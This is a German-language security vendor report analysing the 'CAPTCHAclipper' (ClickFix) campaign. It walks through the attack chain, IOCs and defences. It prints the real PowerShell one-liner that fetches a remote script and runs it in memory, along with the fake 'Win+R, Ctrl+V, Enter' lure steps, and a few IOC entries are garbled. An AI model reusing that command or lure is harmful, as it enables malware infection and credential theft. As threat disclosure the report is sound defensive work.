Von CAPTCHA zum Cyberangriff: Neue Angriffsmethode „CAPTCHAclipper“ entdeckt

Das SOC-Team von Conscia hat einen neuen Angriff aufgedeckt, der CAPTCHA- Abfragen ausnutzt. Der „CAPTCHAclipper“-Angriff verbindet Social Engineering und technische Raffinesse, um Malware zu installieren. Lesen Sie unsere Analyse, um die Angriffskette, die IOCs und die Abwehrmaßnahmen zu verstehen.

Das Team des Conscia Security Operations Center (SOC) hat kürzlich eine sorgfältig ausgearbeitete Angriffskette aufgedeckt, die von einem Bedrohungsakteur ausgeführt wurde, der eine scheinbar harmlose CAPTCHA-Aufforderung nutzte.

Dieser Angriff, den wir CAPTCHAclipper genannt haben, ist ein Beispiel für das Zusammenspiel von Social Engineering und technischer Raffinesse, um die Systeme der Opfer zu kompromittieren und vertrauliche Daten auszuspionieren.

Wir beobachteten dieselben TTPs bei drei verschiedenen Angriffen im Laufe eines Monats, die alle in der geografischen Region Europa stattfanden.

Angesichts der Art der Angriffskette vermuten wir, dass ein erfahrener Bedrohungsakteur hinter diesen Angriffen steckt. Zum Zeitpunkt der Erstellung dieses Berichts können wir jedoch noch keine Zuordnung vornehmen. Bei der Hauptnutzlast handelt es sich wahrscheinlich um eine Variante der LummaC2 malware.

Als wir den Vorfall zum ersten Mal untersuchten, wurden die bereitgestellten IOCs nicht als bösartig eingestuft, was auf die Verwendung neuartiger TTPs hindeutet. Zum Zeitpunkt der Veröffentlichung dieses Artikels können wir jedoch bereits feststellen, dass bestimmte AV-Engines zumindest einige der IOCs erkennen, die jedoch leicht verändert und umfunktioniert werden können.

Im Folgenden erläutern wir verschiedene Stufen der Angriffskette.

Analyse der Angriffskette

Stufe 1: Der bösartige CAPTCHA-Köder

Der Angriff begann mit einem gezielten Köder: Die Nutzer wurden auf eine bösartige, aber legitim aussehende Website geleitet, auf der sich eine PDF-Datei befand, die der Nutzer mit einem Phishing-Köder herunterladen sollte. Bevor das Opfer die Datei herunterladen konnte, wurde ihm ein interaktives CAPTCHA vorgelegt.

Figure 1 - Legitimate-looking CAPTCHA is presented to victim
Abbildung 1 – Dem Opfer wird ein legitim aussehendes CAPTCHA präsentiert

Dieser erste Schritt diente einem doppelten Zweck:

  1. Durch die Nachahmung legitimer Überprüfungsmethoden wurde eine Vertrauensbasis geschaffen.
  2. Damit wurde der erste technische Exploit über JavaScript initiiert, den wir auch als ‘ClickFix’ or ‘paste and run’ Technik kennen.

Wenn Nutzer das CAPTCHA eingaben, um auf eine versprochene PDF-Datei zuzugreifen, wurde eine bösartige JavaScript-Nutzlast unbemerkt im Hintergrund ausgeführt.

Dieses Skript kopierte einen PowerShell-Befehl in die Zwischenablage des Systems und bereitete so den Boden für die nächste Phase:

powershell -WindowStyle Hidden -Command “$rQd=‘https://s3-scw-tx.b-cdn[.]net/prizev2[.]txt’; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;”
Figure 2 - HTML code shows embedded JavaScript that copies malicious command to clipboard
Abbildung 2 – HTML-Code zeigt eingebettetes JavaScript, das einen schädlichen Befehl in die Zwischenablage kopiert

Stufe 2: Social Engineering mit schadhaften Anweisungen

Nach dem Ausfüllen des CAPTCHA erhielten die Opfer eine Benachrichtigung, dass sie vor dem Herunterladen der Datei weitere Schritte zur Verifizierung durchführen müssen. Um die Datei herunterzuladen, musste das Opfer die bereitgestellten Anweisungen befolgen, die für den Erfolg des Angriffs entscheidend waren.

  1. Drücken Sie Win+R, um das Dialogfeld Ausführen zu öffnen.
  2. Drücken Sie STRG+V, um den Befehl aus der Zwischenablage einzufügen (nicht wissentlich).
  3. Enter drücken.
Figure 3 - Victim is introduced with fake verification steps to lure them initiating the attack chain
Abbildung 3 – Das Opfer wird mit gefälschten Verifizierungsschritten gelockt, um die Angriffskette zu starten

Dieser scheinbar harmlose Befehl war in Wirklichkeit ein sorgfältig ausgeklügelter Übertragungsmechanismus. Es:

  • Lud das bösartige Skript prizev2.txt von einem Remote-Server herunter.
  • Führt das Skript vollständig im Speicher aus und umgeht damit dateibasierte Erkennungen.

Stufe 3: Bereitstellung der böswilligen Nutzlast

Das heruntergeladene Skript führte mehrere Aufgaben aus, um die weitere Ausbeutung vorzubereiten:

  1. Es rief eine ZIP-Datei (prize.zip) ab von https://fixedzip.oss-ap-southeast-5.aliyuncs.com.
  2. Es extrahiert den Inhalt der ZIP-Datei in einen zufällig erstellten Ordner innerhalb des APPDATA-Verzeichnisses.
  3. Er startete die ausführbare Datei setup.exe und leitete damit die nächste Phase des Angriffs ein.
Figure 4 - the main payload is dropped as Setup.exe in APPDATA directory
Abbildung 4 – die Hauptnutzlast wird als Setup.exe im APPDATA-Verzeichnis abgelegt

Die Verwendung des APPDATA -Verzeichnisses gewährleistete eine minimale Sichtbarkeit für routinemäßige Sicherheitsscans, was den Fokus des Akteurs auf Umgehung unterstreicht.

Stufe 4: Schädliche Aktivitäten von Setup.exe

Die ausführbare Datei Setup.exe war ein wirkungsvolles Tool, das sowohl auf unmittelbare Wirkung als auch auf langfristige Persistenz ausgelegt war. Zu seinen TTPs gehörten:

  • Datendiebstahl: Extrahieren von Anmeldedaten, die in Browserdateien (Logindaten) für verschiedene Browser an ihrem typischen Dateispeicherort gespeichert sind.
  • Auskundschaften: Identifizierung der installierten Antiviren- und Endgeräteschutzsoftware, um die Erkennung zu umgehen oder den Schutz zu deaktivieren.
  • Command-and-Control (C2) Kommunikation: Aufbau einer ausgehenden Verbindung zu 21.4.107:443, die mit der Domain sliperyedhby.icu verbunden ist. Diese Verbindung ermöglichte die Datenexfiltration und weitere Befehle des Angreifers.
  • Persistenz-Mechanismen: Registrierung im Windows Task Scheduler zur automatischen Ausführung nach dem Neustart des Systems. Erstellung einer zusätzlichen Datei (69HT8K.pif), möglicherweise als Täuschungsmanöver oder als zweite Stufe.

Kompromittierungsindikatoren (IOCs)

Datei-Artefakte
Dateiname SHA-256
Setup.exe
  • d19f31a0c9926824ed9554b254804ab805c8d2d5bc68b4b129e7ef520a673feb
  • 8ce1cde3bd1fa945af8e03459775a87dba7275c17401ab19e525b3238609f6b
Autolt3.exe
  • 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
Networking Artifacts
Domains:
  • https://s3-scw-tx.b-cdn[.]net
  • https://fixedzip.oss-ap-southeast-5.aliyuncs[.]com
  • https://dirverif.oss-ap-southeast-5.aliyuncs[.]com/checkpoint/finished/gnerous.txtsliperyedhby[.]icu
IP-Addresse:
  • 104.21.4.107

Auswirkungen und Erkenntnisse

Der CAPTCHAclipper-Angriff zeigt einen ausgeklügelten, vielschichtigen Ansatz zur Kompromittierung von Systemen:

  • Benutzerinteraktion als Angriffsvektor: Der Rückgriff auf benutzergesteuerte Aktionen (Kopieren und Einfügen von Befehlen) ist ein Beispiel für die Effektivität von Social Engineering.
  • Speichergestützte Ausführung: Die Ausführung von Nutzdaten im Speicher minimiert die Erkennung durch herkömmliche Antivirenlösungen.
  • Persistenz und Exfiltration: Durch die Herstellung der Persistenz wurde ein langfristiger Zugriff gewährleistet, während die C2-Kommunikation Datendiebstahl und Fernsteuerung ermöglichte.

Wirksame Verteidigungsstrategien

Der CaptchaClipper-Angriff ist ein Beispiel dafür, wie schnell sich die Taktiken von Cyber-Angreifern weiterentwickeln. Seine Mischung aus technischem Einfallsreichtum und psychologischer Manipulation zeigt, dass proaktive Verteidigungsstrategien unerlässlich sind. Durch den Einsatz von Social Engineering und mehrstufigen Infizierungstechniken umgehen die Angreifer effektiv herkömmliche Verteidigungsmaßnahmen und nutzen das Vertrauen der Benutzer aus.

Um sich gegen solch ausgeklügelte Bedrohungen zu schützen, empfiehlt Conscia SOC Unternehmen einen mehrschichtigen Ansatz für die Cybersicherheit:

  1. User Awareness Training: Führen Sie regelmäßig Schulungen durch, damit die Mitarbeiter Phishing und andere Social-Engineering-Techniken erkennen.
  2. Enable Endpoint Detection and Response (EDR): Implementieren Sie Lösungen, die dateilose Malware und verdächtige PowerShell-Aktivitäten identifizieren und abwehren können.
  3. Kontinuierliche Überwachung von Sicherheitsvorfällen: Der Einsatz von Sicherheitslösungen reicht nicht aus, wenn Sie keine Analysten haben, die die potenziellen Vorfälle überprüfen. Die rechtzeitige Erkennung ist bei dieser Art von Angriffen entscheidend, da der größte Teil der Angriffskette automatisiert ist.
  4. PowerShell-Nutzung einschränken: Beschränken Sie die PowerShell-Ausführung auf zertifizierte Skripts und überwachen Sie die PowerShell-Aktivität genau.
  5. Netzwerküberwachung und Erkennung von Datenlecks: Implementieren Sie Netzwerküberwachungs-Tools, um ungewöhnliche ausgehende Verbindungen zu C2-Servern oder eine nicht autorisierte Datenexfiltration zu erkennen.
  6. Incident Response-Planung: Stellen Sie sicher, dass Ihr Team darauf vorbereitet ist, auf mehrstufige Infektionen mit einer klaren Abhilfestrategie zu reagieren.

Darüber hinaus ermutigen wir alle Cybersicherheitsexperten, sich aktiv an der Cybersicherheitsgemeinschaft zu beteiligen. Sie können:

  • Zusammenarbeiten und Informationen austauschen: Erkenntnisse und Kompromissindikatoren (IOCs) mit vertrauenswürdigen Gemeinschaften austauschen, um ähnliche Bedrohungen zu bekämpfen.
  • Berichten und Untersuchen: Wenn Sie ähnliche Vorkommnisse entdecken, melden Sie sie Ihren Threat-Intelligence-Anbietern oder nationalen Cybersicherheitsbehörden, um neue Entwicklungen zu verfolgen.
  • Verbessern Sie die Jagd auf Bedrohungen: Nutzen Sie diese Analyse als Anwendungsfall zur Verbesserung der Fähigkeiten zur Bedrohungsjagd in Ihrem Unternehmen.